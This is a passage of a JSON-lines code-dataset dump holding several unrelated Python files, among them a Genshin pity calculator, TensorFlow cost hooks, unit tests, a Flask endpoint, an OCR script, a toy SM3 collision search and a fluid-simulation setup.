print(f'\\33[92m{TSOFT.replace(\"?num?\", f\"{73 - isoft}\")}\\33[34m')\n else:\n if isoft >= 63:\n isoft = isoft + 11\n print(f'\\33[92m{SOFT.replace(\"?num?\", \"64\")} {dict_prc[isoft]}\\33[34m')\n else:\n print(f'\\33[92m{TSOFT.replace(\"?num?\", f\"{63 - isoft}\")}\\33[34m')\n\n print(f'{PITY5}' + f'{n_star5} / {list_rec}' + f'\\n{LAST} 5*: ' + star5[1][5:])\n if BANNER == 200:\n if f'{star5_[0]}'[-3] == 'r' and f'{star5_[1]}'[-3] == 'r':\n print(f'{NEXT.replace(\"?star?\", \"5*\")}' + 'Weapon')\n n5star = 'Weapon'\n elif f'{star5_[0]}'[-3] == 'n' and f'{star5_[1]}'[-3] == 'n':\n print(f'{NEXT.replace(\"?star?\", \"5*\")}' + 'Character')\n n5star = 'Character'\n break\n\n star4_ = search_string_in_file('log.txt', '4* - ')\n\n if str(star4_) == '[]':\n if os.path.exists(f'{os.environ[\"APPDATA\"]}/nitolar play/pity calc/{BANNER}.json') == True:\n with open(f'{os.environ[\"APPDATA\"]}/nitolar play/pity calc/{BANNER}.json', \"r\", encoding='utf-8') as data_:\n data = json.load(data_)\n print(f'{PITY4}' + f'{data[\"4*\"][0][\"pity\"]}' + f'\\n{LAST} 4*: ' + f'{data[\"4*\"][0][\"last\"]}')\n if data[\"4*\"][0][\"next\"] != None:\n print(f'{NEXT.replace(\"?star?\", \"4*\")}' + f'{data[\"4*\"][0][\"next\"]}')\n data_.close()\n load = True\n else:\n print(f'{PITY4}' + f'{NO_WISH_HISTORY_ERROR} 4*' + f'\\n{LAST} 4*: ' + NO_WISH_HISTORY_ERROR2)\n load = True\n\n n4star = None\n\n for star4 in star4_:\n n_star4 = 10 - int(star4[0]) + 1\n if n_star4 <= 0:\n n_star4 = 1\n print(f'{PITY4}' + f'{n_star4} / 10' + f'\\n{LAST} 4*: ' + star4[1][5:])\n if f'{star4_[0]}'[-3] == 'r' and f'{star4_[1]}'[-3] == 'r':\n print(f'{NEXT.replace(\"?star?\", \"4*\")}' + 'Weapon')\n n4star = 'Weapon'\n elif f'{star4_[0]}'[-3] == 'n' and f'{star4_[1]}'[-3] == 'n':\n print(f'{NEXT.replace(\"?star?\", \"4*\")}' + 'Character')\n n4star = 'Character'\n break\n\n if load != True:\n if os.getenv('cache') == \"True\":\n with open(f'{os.environ[\"APPDATA\"]}/nitolar play/pity 
calc/{BANNER}.json', 'w+', encoding='utf-8') as cach:\n ap = {}\n ap['5*'] = []\n ap['4*'] = []\n\n ap['5*'].append({\n 'last': star5[1][5:],\n 'pity': f'{n_star5} / {list_rec}',\n 'soft': isoft,\n 'next': n5star\n })\n\n ap['4*'].append({\n 'last': star4[1][5:],\n 'pity': f'{n_star4} / 10',\n 'next': n4star\n })\n json.dump(ap, cach, indent=4)\n cach.close()\n\n if REPEAT_FLAG == 'yes':\n print('----------------------------------------')\n sleep(int(os.getenv('sleep')))\n check_()\n elif REPEAT_FLAG == 'no':\n print('----------------------------------------' + '\\33[0m')\n user_input()\n\nglobal ISET\nISET = False\n\ndef user_input():\n global REPEAT_FLAG\n REPEAT_FLAG = os.getenv('repeat')\n try:\n banner = gs.get_banner_types(AUTH)\n except (gs.errors.AuthkeyTimeout, gs.errors.InvalidAuthkey):\n if S_MSG == False:\n print('\\33[31m' + AUTH_TIMEOUT + '\\33[0m')\n if str(os.listdir(f'{os.environ[\"APPDATA\"]}/nitolar play/pity calc')) == '[]':\n print('\\33[93m' + NOCACHE + '\\33[0m')\n quit()\n while True:\n print('\\33[93m' + LCACHE.replace('?nums?', str(os.listdir(f'{os.environ[\"APPDATA\"]}/nitolar play/pity calc'))) + '\\33[0m')\n\n global ID_CACHE\n ID_CACHE = input(ID)\n\n if ID_CACHE == 'quit':\n quit()\n\n if ID_CACHE not in os.listdir(f'{os.environ[\"APPDATA\"]}/nitolar play/pity calc'):\n print('----------------------------------------')\n print('\\33[31m' + ERROR + '\\33[0m')\n print('----------------------------------------')\n continue\n else:\n dict_prc = {74: '6.6%', 75: '12.6%', 76: '18.6%', 77: '24.6%', 78: '30.6%', 79: '36.6%', 80: '42.6%', 81: '48.6%', 82: '54.6%', 83: '60.6%', 84: '66.6%', 85: '72.6%', 86: '78.6%', 87: '84.6%', 88: '90.6%', 89: '96.6%', 90: '100%'}\n\n list_rec = 90\n if ID_CACHE[0:3] == '302':\n list_rec = 80\n\n print('\\33[34m----------------------------------------\\33[0m')\n with open(f'{os.environ[\"APPDATA\"]}/nitolar play/pity calc/{ID_CACHE[0:3]}.json', \"r\", encoding='utf-8') as data_:\n data = json.load(data_)\n isoft = int(data['5*'][0]['soft'])\n if list_rec == 80:\n if isoft >= 63:\n isoft = isoft + 11\n print(f'\\33[92m{SOFT.replace(\"?num?\", \"64\")} {dict_prc[isoft]}\\33[34m')\n else:\n print(f'\\33[92m{TSOFT.replace(\"?num?\", f\"{63 - isoft}\")}\\33[34m')\n else:\n if isoft >= 73:\n isoft = isoft + 1\n print(f'\\33[92m{SOFT.replace(\"?num?\", \"74\")} {dict_prc[isoft]}\\33[34m')\n else:\n print(f'\\33[92m{TSOFT.replace(\"?num?\", f\"{73 - isoft}\")}\\33[34m')\n\n print(f'{PITY5}' + f'{data[\"5*\"][0][\"pity\"]}' + f'\\n{LAST} 5*: ' + f'{data[\"5*\"][0][\"last\"]}')\n if data[\"5*\"][0][\"next\"] != None:\n print(f'{NEXT.replace(\"?star?\", \"5*\")}' + f'{data[\"5*\"][0][\"next\"]}')\n print(f'{PITY4}' + f'{data[\"4*\"][0][\"pity\"]}' + f'\\n{LAST} 4*: ' + f'{data[\"4*\"][0][\"last\"]}')\n if data[\"4*\"][0][\"next\"] != None:\n print(f'{NEXT.replace(\"?star?\", \"4*\")}' + f'{data[\"4*\"][0][\"next\"]}')\n data_.close()\n print('----------------------------------------')\n continue\n\n print(f'\\33[0m{banner}')\n print('\\33[33m' + QUIT_ + '\\33[0m')\n\n global BANNER\n global ISET\n\n if len(sys.argv) < 2:\n BANNER = input(ID)\n else:\n if ISET == False:\n print(ID + str(sys.argv[1]))\n BANNER = int(sys.argv[1])\n ISET = True\n else:\n BANNER = input(ID)\n\n try:\n BANNER = int(BANNER)\n\n if banner.get(BANNER) == None:\n print('----------------------------------------')\n print('\\33[31m' + ERROR + '\\33[0m')\n print('----------------------------------------')\n user_input()\n else:\n if REPEAT_FLAG == 'ask':\n print('\\33[31m' 
+ REPEAT_W + '\\33[0m')\n r_a = ['no', 'yes']\n while True:\n REPEAT_FLAG = input(REPEAT)\n if REPEAT_FLAG not in r_a:\n print('\\33[31m' + REPEAT_ERROR2 + '\\33[0m')\n print('----------------------------------------')\n continue\n else:\n break\n print('\\33[34m' + '----------------------------------------')\n check_()\n except: \n if BANNER == 'quit':\n quit()\n print('----------------------------------------')\n print('\\33[31m' + ERROR + '\\33[0m')\n print('----------------------------------------')\n user_input()\n\nuser_input()","repo_name":"nitolar/genshin-pity-calculator","sub_path":"pity.py","file_name":"pity.py","file_ext":"py","file_size_in_byte":12898,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"46525762251","text":"import numpy as np\n\nMEMORY_MULTIPLIER = 4 # 4 bytes per variable\nLAST_DIMS = None\n\n\ndef get_attr(node, name, typ=\"ints\"):\n out = []\n for attr in node.attribute:\n if attr.name == name:\n for val in eval(\"attr.{}\".format(typ)):\n out.append(val)\n return tuple(out)\n\n\ndef conv_transpose_hook(node, inputs, outputs):\n mem_cost = np.prod(outputs) * MEMORY_MULTIPLIER\n weight = node.weights[0].shape\n cin = weight[3]\n cout = weight[2]\n ops_per_output = cin\n ops = ops_per_output * np.prod(outputs)\n return ops, mem_cost\n\n\ndef conv_hook(node, inputs, outputs):\n # NOTE: This method assumes shapes are ordered as NHWC\n if None in outputs and None not in inputs and node.padding == \"valid\":\n # Fill in unknown height and width. Note that padding = 0 for a \"valid\" Conv2D.\n H = int((inputs[1] - node.dilation_rate[0] * (node.kernel_size[0] - 1) - 1) /\n node.strides[0] + 1)\n W = int((inputs[2] - node.dilation_rate[1] * (node.kernel_size[1] - 1) - 1) /\n node.strides[1] + 1)\n newshape = (outputs[0], H, W, outputs[3])\n print(\"Inferred Conv2D shape: {} => {}\".format(outputs, newshape))\n outputs = newshape\n\n mem_cost = np.prod(outputs) * MEMORY_MULTIPLIER\n weight = node.weights[0].shape\n # NHWC\n cout = weight[3]\n cin = weight[2]\n kernel = weight[:2]\n batch = inputs[0]\n ops_per_output = np.prod(kernel) * cin\n ops = ops_per_output * np.prod(outputs)\n return ops, mem_cost\n\n\ndef depthwise_conv_hook(node, inputs, outputs):\n weight = node.weights[0].shape\n cout = weight[3]\n cin = weight[2]\n kernel = weight[:2]\n batch = inputs[0]\n ops_per_output = np.prod(kernel) # don't look at rest of input\n ops = ops_per_output * np.prod(outputs)\n\n mem_cost = np.prod(outputs) * MEMORY_MULTIPLIER\n return ops, mem_cost\n\n\ndef bn_hook(node, inputs, outputs):\n mem_cost = np.prod(outputs) * MEMORY_MULTIPLIER\n ops = 4 * np.prod(inputs)\n return ops, mem_cost\n\n\ndef relu_hook(node, inputs, outputs):\n ops = np.prod(inputs)\n mem_cost = np.prod(outputs) * MEMORY_MULTIPLIER\n return ops, mem_cost\n\n\ndef pool_hook(node, inputs, outputs):\n mem_cost = np.prod(outputs) * MEMORY_MULTIPLIER\n\n # ops_per_output = np.prod(kernel)\n ops_per_output = 0 # TODO fix\n ops = ops_per_output * np.prod(outputs)\n return ops, mem_cost\n\n\ndef add_hook(node, inputs, outputs):\n assert len(inputs) > 1, \"add needs more than one input\"\n mem_cost = np.prod(outputs) * MEMORY_MULTIPLIER\n ops = sum([np.prod(inp) for inp in inputs])\n return ops, mem_cost\n\n\ndef pad_hook(node, inputs, outputs):\n mem_cost = np.prod(outputs) * MEMORY_MULTIPLIER\n ops = 0\n return ops, mem_cost\n\n\ndef fc_hook(node, inputs, outputs):\n batch_size = inputs[0]\n cin = inputs[-1]\n cout = outputs[-1]\n\n ops = batch_size * 
cin * cout\n mem_cost = np.prod(outputs) * MEMORY_MULTIPLIER\n return ops, mem_cost\n\n\ndef concat_hook(node, inputs, outputs):\n assert len(inputs) > 1, \"cooncat needs more than one input\"\n ops = 0\n mem_cost = np.prod(outputs) * MEMORY_MULTIPLIER\n return ops, mem_cost\n\n\ndef reshape_hook(node, inputs, outputs):\n if outputs.count(None) == 1:\n # Compute missing dimension from inputs\n input_count = np.prod(inputs)\n output_count = np.prod([d for d in outputs if d is not None])\n missing_dim = input_count // output_count\n outputs = tuple(d if d is not None else missing_dim for d in outputs)\n assert np.prod(outputs) == input_count, \\\n \"Could not infer missing dimension in reshape output\"\n\n mem_cost = np.prod(outputs) * MEMORY_MULTIPLIER\n ops = 0\n return ops, mem_cost\n\n\ndef upsample_hook(node, inputs, outputs):\n mem_cost = np.prod(outputs) * MEMORY_MULTIPLIER\n if node.interpolation == \"nearest\":\n # Assuming 1 op per interpolated point.\n ops = np.prod(outputs)\n elif node.interpolation == \"bilinear\":\n # 5x cost heuristic from\n # http://web.pdx.edu/~jduh/courses/Archive/geog481w07/Students/Craver_Resampling.pdf\n ops = np.prod(outputs) * 5\n else:\n raise NotImplementedError(\"Unsupported interpolation method\")\n return ops, mem_cost\n\n\ndef dropout_hook(node, inputs, outputs):\n mem_cost = np.prod(outputs) * MEMORY_MULTIPLIER\n ops = 0\n return ops, mem_cost\n\n\ndef pspnet_interp_hook(node, inputs, outputs):\n # Custom layer Interp used in keras_segmentation.models.pspnet_50\n # for bilinear interpolation\n mem_cost = np.prod(outputs) * MEMORY_MULTIPLIER\n ops = np.prod(outputs) * 5\n return ops, mem_cost\n\n\ndef pspnet_lambda_hook(node, inputs, outputs):\n # Assume channels are last. Check that this layer removes\n # one row and one column from the input, which is how\n # Lambda is used in PSPNet.\n assert inputs[0] == outputs[0] and inputs[3] == outputs[3]\n assert inputs[1] == outputs[1] + 1\n assert inputs[2] == outputs[2] + 1\n mem_cost = np.prod(outputs) * MEMORY_MULTIPLIER\n return 0, mem_cost\n\n\n# todo concatenate\n# todo flatten\nhooks = {\n # General hooks\n 'Conv2D': conv_hook,\n 'Conv2DTranspose': conv_transpose_hook,\n 'Cropping2D': pool_hook, # TODO fix\n 'DepthwiseConv2D': depthwise_conv_hook,\n 'BatchNormalization': bn_hook,\n 'Activation': relu_hook,\n 'ReLU': relu_hook,\n 'MaxPooling2D': pool_hook,\n 'Dropout': dropout_hook,\n 'Concatenate': concat_hook,\n 'Add': add_hook,\n 'GlobalAveragePooling2D': pool_hook,\n 'AveragePooling2D': pool_hook,\n # 'Shape': shape_hook,\n 'Flatten': reshape_hook,\n 'Concat': concat_hook,\n 'Reshape': reshape_hook,\n 'UpSampling2D': upsample_hook,\n 'Dense': fc_hook,\n # 'Gemm': gemm_hook,\n # 'Squeeze' : reshape_hook,\n 'ZeroPadding2D': pad_hook,\n\n # Model specific hooks\n 'Interp': pspnet_interp_hook,\n 'Lambda': pspnet_lambda_hook,\n}\n\n\ndef add_batch(tup, b):\n if tup[0] is None:\n lst = list(tup)\n lst[0] = b\n return tuple(lst)\n return tup\n\n\ndef op_hook(layer, batch_size=1):\n input_shapes = layer.input_shape\n output_shapes = layer.output_shape\n\n if type(input_shapes) == tuple:\n inputs = add_batch(input_shapes, batch_size)\n elif type(input_shapes) == list:\n inputs = []\n for input_shape in input_shapes:\n inputs.append(add_batch(input_shape, batch_size))\n else:\n raise ValueError(\"layer.input_shapes must be tuple or list\")\n\n if type(output_shapes) == tuple:\n outputs = add_batch(output_shapes, batch_size)\n elif type(output_shapes) == list:\n outputs = []\n for output_shape in 
output_shapes:\n outputs.append(add_batch(output_shape, batch_size))\n else:\n raise ValueError(\"layer.output_shape must be tuple or list\")\n\n # Shape checks\n if len(inputs) == 0 or len(outputs) == 0:\n print(\"WARN: No inputs or no outputs?\", type(layer),\n \"input shape:\", inputs, \"output shape:\", outputs)\n\n if None in inputs or None in outputs:\n print(\"WARN: Layer of type {} has None in shape\".format(type(layer)),\n \"input shape:\", inputs, \"output shape:\", outputs)\n\n ops, mem_cost = hooks[layer.__class__.__name__](layer, inputs, outputs)\n return ops, mem_cost\n","repo_name":"uwsampl/dtr-prototype","sub_path":"checkmate_comp/remat/tensorflow2/extraction_hooks.py","file_name":"extraction_hooks.py","file_ext":"py","file_size_in_byte":7327,"program_lang":"python","lang":"en","doc_type":"code","stars":124,"dataset":"github-code","pt":"45"} +{"seq_id":"9874996510","text":"import os\nimport unittest\n\nfrom coala_langserver.diagnostic import output_to_diagnostics\n\n\ndef get_output(filename):\n file_path = os.path.join(os.path.dirname(__file__),\n 'resources/diagnostic',\n filename)\n with open(file_path, 'r') as file:\n output = file.read()\n return output\n\n\nclass DiagnosticTestCase(unittest.TestCase):\n\n def test_none_output(self):\n result = output_to_diagnostics(None)\n self.assertEqual(result, None)\n\n def test_severity_info(self):\n output = get_output('output_severity_info.json')\n result = output_to_diagnostics(output)\n\n # INFO: 0 (coala) -> Information: 3 (LSP)\n self.assertEqual(result[0]['severity'], 3)\n\n def test_severity_normal(self):\n output = get_output('output_severity_normal.json')\n result = output_to_diagnostics(output)\n\n # NORMAL: 1 (coala) -> Warning: 2 (LSP)\n self.assertEqual(result[0]['severity'], 2)\n\n def test_severity_major(self):\n output = get_output('output_severity_major.json')\n result = output_to_diagnostics(output)\n\n # MAJOR: 2 (coala) -> Error: 1 (LSP)\n self.assertEqual(result[0]['severity'], 1)\n\n def test_char_none(self):\n output = get_output('output_char_none.json')\n result = output_to_diagnostics(output)\n\n # None column should be regarded as the whole line\n start_line = result[0]['range']['start']['line']\n start_char = result[0]['range']['start']['character']\n end_line = result[0]['range']['end']['line']\n end_char = result[0]['range']['end']['character']\n self.assertEqual(start_char, 0)\n self.assertEqual(end_char, 0)\n self.assertEqual(start_line + 1, end_line)\n\n def test_normal_offset(self):\n output = get_output('output_normal_offset.json')\n result = output_to_diagnostics(output)\n\n # normal offset, one-based -> zero-based\n start_line = result[0]['range']['start']['line']\n start_char = result[0]['range']['start']['character']\n end_line = result[0]['range']['end']['line']\n end_char = result[0]['range']['end']['character']\n self.assertEqual(start_char, 0)\n self.assertEqual(end_char, 1)\n self.assertEqual(start_line, 0)\n self.assertEqual(end_line, 0)\n\n def test_multiple_problems(self):\n output = get_output('output_multiple_problems.json')\n result = output_to_diagnostics(output)\n\n # should be able to handle multiple bears & problems\n self.assertEqual(len(result), 3)\n","repo_name":"coala/coala-ls","sub_path":"tests/test_diagnostic.py","file_name":"test_diagnostic.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"45"} +{"seq_id":"26908950850","text":"from enum import Enum, auto\n\nimport pytest\n\nimport 
streamson\nfrom streamson.handler import BufferHandler, PythonConverterHandler\nfrom streamson.output import Output\n\n\nclass Kind(Enum):\n FD = auto()\n ITER = auto()\n\n\n@pytest.mark.parametrize(\n \"kind,convert\",\n [\n (Kind.FD, None),\n (Kind.FD, lambda x: x),\n (Kind.FD, lambda x: f\"X{x.decode()}X\".encode()),\n (Kind.ITER, None),\n (Kind.ITER, lambda x: x),\n (Kind.ITER, lambda x: f\"X{x.decode()}X\".encode()),\n ],\n ids=[\n \"fd-raw\",\n \"fd-same\",\n \"fd-xx\",\n \"iter-raw\",\n \"iter-same\",\n \"iter-xx\",\n ],\n)\ndef test_simple(io_reader, data, kind, convert):\n matcher = streamson.SimpleMatcher('{\"users\"}[]')\n buff_handler = BufferHandler()\n handler = PythonConverterHandler(convert) + buff_handler if convert else buff_handler\n\n if kind == Kind.ITER:\n filtered = streamson.filter_iter((e for e in data), [(matcher, handler)])\n elif kind == Kind.FD:\n filtered = streamson.filter_fd(io_reader, [(matcher, handler)], 5)\n\n output = Output(filtered).generator()\n assert next(output) == (None, b'{\"users\": [], \"groups\": [\"admins\", \"users\"]}')\n with pytest.raises(StopIteration):\n next(output)\n\n convert = convert if convert else (lambda x: x)\n assert buff_handler.pop_front() == ('{\"users\"}[0]', [e for e in convert(b'\"john\"')])\n assert buff_handler.pop_front() == ('{\"users\"}[1]', [e for e in convert(b'\"carl\"')])\n assert buff_handler.pop_front() == ('{\"users\"}[2]', [e for e in convert(b'\"bob\"')])\n assert buff_handler.pop_front() is None\n","repo_name":"shenek/python-streamson","sub_path":"tests/test_filter.py","file_name":"test_filter.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"25595840648","text":"import asyncio\r\nimport sys\r\n\r\nimport streamlit as st\r\n\r\nfrom arguments_parser import Params, parse\r\nfrom dashboard.page1 import factory_dashboard\r\nfrom dashboard.page2 import production_work_history_dashboard\r\nfrom dashboard.page3 import factory_chatbot\r\n\r\nPAGE1 = '全体状況'\r\nPAGE2 = '製造ライン作業履歴'\r\nPAGE3 = '製造ライン情報Chatbot'\r\n\r\n\r\nasync def main(param: Params):\r\n st.set_page_config(\r\n page_title='manufacturing-line-dashboard-with-surrealdb',\r\n layout='wide',\r\n )\r\n\r\n selected_menu = st.sidebar.radio(\"メニュー\", [PAGE1, PAGE2, PAGE3])\r\n st.sidebar.markdown('---')\r\n\r\n if selected_menu == PAGE1:\r\n await factory_dashboard.run(param)\r\n\r\n elif selected_menu == PAGE2:\r\n await production_work_history_dashboard.run(param)\r\n\r\n elif selected_menu == PAGE3:\r\n await factory_chatbot.run(param)\r\n\r\n else:\r\n pass\r\n\r\n\r\nif __name__ == '__main__':\r\n # [引数]\r\n # [--server localhost] SurrealDB ホスト名\r\n # [--prot 8000] SurrealDB ポート番号\r\n # [--namespace test] SurrealDB 名前空間名\r\n # [--database test] SurrealDB データベース名\r\n # [--user root] SurrealDB 認証ユーザ\r\n # [--PW root] SurrealDB 認証ユーザ パスワード\r\n args = sys.argv\r\n param = parse(args=args[1:])\r\n asyncio.run(main(param))\r\n","repo_name":"tmarumaru/SurrealDB-FactoryDemo","sub_path":"main/dashboard/dashboard_main.py","file_name":"dashboard_main.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"9541326220","text":"def gameOfThrones(s):\r\n # Write your code here\r\n even = 0\r\n odd = 0\r\n t = []\r\n for i in s:\r\n if s.count(i)%2==0:\r\n if i not in t:\r\n even+=1\r\n t.append(i)\r\n else:\r\n if i not in t:\r\n odd+=1\r\n t.append(i)\r\n if 
odd>1:\r\n print(\"NO\")\r\n elif odd>=0 and even==0:\r\n print(\"NO\")\r\n else:\r\n print(\"YES\")\r\ns = input()\r\n\r\nresult = gameOfThrones(s)\r\n","repo_name":"Surendra0008/hackerrank","sub_path":"Game of Thrones-1.py","file_name":"Game of Thrones-1.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"20140047270","text":"from PIL import Image\nimport cv2\nimport pytesseract\nimport os\nimport numpy as np\nimport pandas as pd\nimport re\nfrom pdf2image import convert_from_bytes\n\ndef get_conf(page_gray):\n df = pytesseract.image_to_data(page_gray, output_type='data.frame')\n df.drop(df[df.conf==-1].index.values,inplace=True)\n df.reset_index()\n return df.conf.mean()\n\ndef deskew(image):\n gray = cv2.bitwise_not(image)\n temp_arr = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)[1]\n coords = np.column_stack(np.where(temp_arr>0))\n angle = cv2.minAreaRect(coords)[-1]\n if angle < -45:\n angle = -(90 + angle)\n else:\n angle = -angle\n (h, w) = image.shape[:2]\n center = (w // 2, h // 2)\n M = cv2.getRotationMatrix2D(center, angle, 1.0)\n rotated = cv2.warpAffine(image, M, (w, h), flags=cv2.INTER_CUBIC, borderMode=cv2.BORDER_REPLICATE)\n return rotated\n\nOCR_dic = {}\nfile_list = ['vsco.pdf']\n\nfor file in file_list:\n pdf_file = convert_from_bytes(open(os.path.join('/Users/sameepshah/Documents/Vardhaman Surgical Co./python_parsing',file), 'rb').read())\n # create a df to save each pdf's text\n pages_df = pd.DataFrame(columns=['conf','text'])\n for (i,page) in enumerate(pdf_file) :\n try:\n # transfer image of pdf_file into array\n page_arr = np.asarray(page)\n # transfer into grayscale\n page_arr_gray = cv2.cvtColor(page_arr,cv2.COLOR_BGR2GRAY)\n # deskew the page\n page_deskew = deskew(page_arr_gray)\n # cal confidence value\n page_conf = get_conf(page_deskew)\n # extract string\n new_row = pd.DataFrame(columns=['conf' 'text'], data={'conf': page_conf,'text': pytesseract.image_to_string(page_deskew)})\n pages_df = pd.concat([pages_df, new_row], ignore_index=True)\n except:\n # if can't extract then give some notes into df\n new_row = pd.DataFrame(columns=['conf' 'text'], data={'conf':-1, 'text': 'N/A'})\n pages_df = pd.concat([pages_df, new_row], ignore_index=True)\n continue\n # save df into a dict with filename as key \n OCR_dic[file]=pages_df\n print('{} is done'.format(file))\n \nprint(OCR_dic[file_list[1]])","repo_name":"sameep-git/vscowebsite","sub_path":"python_parsing/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"26506408490","text":"import time\nimport random\nfrom gmssl import sm3, func\ndef my_sm3(m):\n #input number\n m = hex(m)[2:]\n m = bytes(m, encoding=\"utf8\")\n m = sm3.sm3_hash(func.bytes_to_list(m))\n return m\n\n\ndef rho_method(n):\n m = random.randint(0, 0xffffff)\n dict={}\n for i in range(2**256):\n original_m = m\n temp=bytes(hex(m)[2:], encoding=\"utf8\")\n m = my_sm3(m)\n dict[m[:n]]=original_m\n m = (2 * original_m + 1)\n if my_sm3(m)[:n] in dict.keys():\n print(\"找到碰撞\")\n print(bytes(hex(m)[2:], encoding=\"utf8\"))\n print(bytes(hex(dict[my_sm3(m)[:n]])[2:], encoding=\"utf8\"))\n print(\"查找了{0}次\".format(i))\n return\n print(\"失败\")\n\nif __name__==\"__main__\":\n start=time.time()\n rho_method(4)\n end=time.time()\n 
print(\"运行时间为:{0}\".format(end-start))\n","repo_name":"Chocker926/Security_in_action","sub_path":"SM3_Rho/SM3_Rho.py","file_name":"SM3_Rho.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"35619342920","text":"from flask import request, abort, g\r\nfrom controller import bp, db\r\nfrom controller.model import Post, get_url_post, get_time_to_read, Comment\r\nfrom datetime import datetime\r\nfrom controller.auth import token_auth\r\nfrom bson.objectid import ObjectId\r\nimport pymongo\r\nfrom bs4 import BeautifulSoup\r\n\r\n\r\n@bp.route('/topuser', methods=['GET'])\r\n@token_auth.login_required(optional=True)\r\ndef get_top_user():\r\n try:\r\n res = {}\r\n query = db[\"user\"].aggregate([\r\n {\r\n \"$project\":{\r\n \"_id\" : 1,\r\n \"username\" : 1,\r\n \"display_name\" : 1,\r\n \"email\" : 1,\r\n \"link_facebook\": 1,\r\n \"avatar\": 1,\r\n \"bio\": 1,\r\n \"post\" : { \"$sum\" : \"$list_post\"}\r\n }\r\n },{\r\n \"$sort\":{\r\n \"post\" : -1\r\n }\r\n },{\r\n \"$limit\" : 20\r\n },{\r\n \"$project\" :{\r\n \"_id\" : 1,\r\n \"username\" : 1,\r\n \"display_name\" : 1,\r\n \"email\" : 1,\r\n \"link_facebook\": 1,\r\n \"avatar\": 1,\r\n \"bio\": 1,\r\n }\r\n }\r\n ])\r\n if(query != None):\r\n list_top_user = list(query)\r\n list_res = []\r\n for row_data in list_top_user:\r\n temp_res ={}\r\n temp_res[\"_id\"] = str(row_data[\"_id\"])\r\n temp_res[\"username\"] = str(row_data[\"username\"])\r\n temp_res[\"display_name\"] = str(row_data[\"display_name\"])\r\n temp_res[\"email\"] = str(row_data[\"email\"])\r\n temp_res[\"link_facebook\"] = str(row_data[\"link_facebook\"])\r\n temp_res[\"avatar\"] = str(row_data[\"avatar\"])\r\n temp_res[\"bio\"] = str(row_data[\"bio\"])\r\n list_res.append(temp_res)\r\n res[\"data\"] = list_res\r\n return res \r\n except Exception as exc:\r\n print(f\"Error: {exc}\")\r\n abort(401)","repo_name":"nghialuffy/write_down_project","sub_path":"backend/controller/top_user.py","file_name":"top_user.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"34763592136","text":"import sys\nimport time\nimport socket\nimport pickle\nfrom diffpiso import *\nfrom diffpiso.networks import initialise_fullyconv_network\nfrom diffpiso.losses import *\n\nbase_path = '../learnedTurbulenceModelling_data/spatialMixingLayer/' # set base directory where dataset is located/ simulation will be stored\n\nstarting_frame = 0\ntimesteps = 2500\n\nlearning_dir = '' # set directory where model is stored\nmodel_id = '' # set model number (id scheme in learning: EEEEEEiXXXXXX with E as epoch number and X as iteration number)\n\ndef neural_network_wrapper(neural_network, input, fluid, physical_parameters, simulation_parameters, loss_buffer_width, buffer_width):\n sponge_start = int(simulation_parameters['HRres'][1] * simulation_parameters['sponge_ratio']) // simulation_parameters['dx_ratio']\n NN_in = input[:, :, :sponge_start, :]\n NN_out = tf.pad(neural_network(NN_in), ((0, 0), (0, 0), (0, fluid.resolution[1] - sponge_start), (0, 0)))\n return NN_out\n\nphysical_parameters = {'average_velocity': 1,\n 'velocity_difference': 1,\n 'inlet_profile_sharpness': 2,\n 'viscosity': .002}\n\nsimulation_parameters = {'HRres': [64,64*4], # [512,512*4],\n 'dx_ratio': 1, # 8,\n 'differentiation_scheme': 'central_difference_new',\n 'dt': .05,\n 'dt_ratio': 1, # 8,\n 'box': box[0:64,0:64*4],\n 
'sponge_ratio': .875,\n 'relative_sponge_max': 20}\n\ntraining_dict = {'step_count': 1,\n 'grad_stop': 0,\n 'artificial_batch': 1,\n 'epochs': 5,\n 'dataset': base_path+'/sml_HR_512-2048_dx8_dt8_pert0.082-0.018/',\n 'dataset_characteristics': [(0.082,0.018)],\n 'start_frame': 8010,\n 'frame_count_training': 27000,\n 'frame_count_validation': 4900,\n 'perturb_inlet': True,\n 'pressure_included': True,\n 'network_initialiser': initialise_fullyconv_network,\n 'padding': 'VALID',\n 'load_model_path': base_path+learning_dir+'/model_epoch_'+model_id+'.ckpt',\n 'loss_functions': [L2_field_loss],\n 'loss_factor': [1],\n 'HR_buffer_width': [[0, 0], [0, 0]],\n 'data_shuffling_seeds': None,\n 'start_first_epoch_at': 0,\n 'learning_rate': 8e-6,\n 'lr_decay_fun': lambda l: l*.8,\n 'store_interm_ckpts': 200,\n 'staggered_formulation': False\n }\n\nbuffer_width = [[i // simulation_parameters['dx_ratio'] for i in j] for j in training_dict['HR_buffer_width']]\nsponge_start = int(simulation_parameters['HRres'][1] * simulation_parameters['sponge_ratio']) // simulation_parameters['dx_ratio'] # //2\n\nsolver_precision = 1e-8\ndomain, sim_physics, pressure_solver, velocity_placeholder, velocity, pressure_placeholder, pressure, viscosity_field, bc_placeholders, bcx= \\\n spatialMixingLayer_setup(simulation_parameters, solver_precision, physical_parameters, 1)\n\n# NN DEFINITION -------------------------------------------------------------------------------------------------\nif (training_dict['load_model_path']is None):\n load_model_path = base_path + '/model_epoch_'+str(training_dict['epochs']-1).zfill(6)+'.ckpt'\nelse:\n load_model_path = training_dict['load_model_path']\n\nprint('LOAD MODEL PATH',load_model_path)\nassert training_dict['network_initialiser'] is not None\nneural_network, weights, loss_buffer_width = \\\n training_dict['network_initialiser'](buffer_width=buffer_width, padding=training_dict['padding'], restore_shape=True)\nsaver = 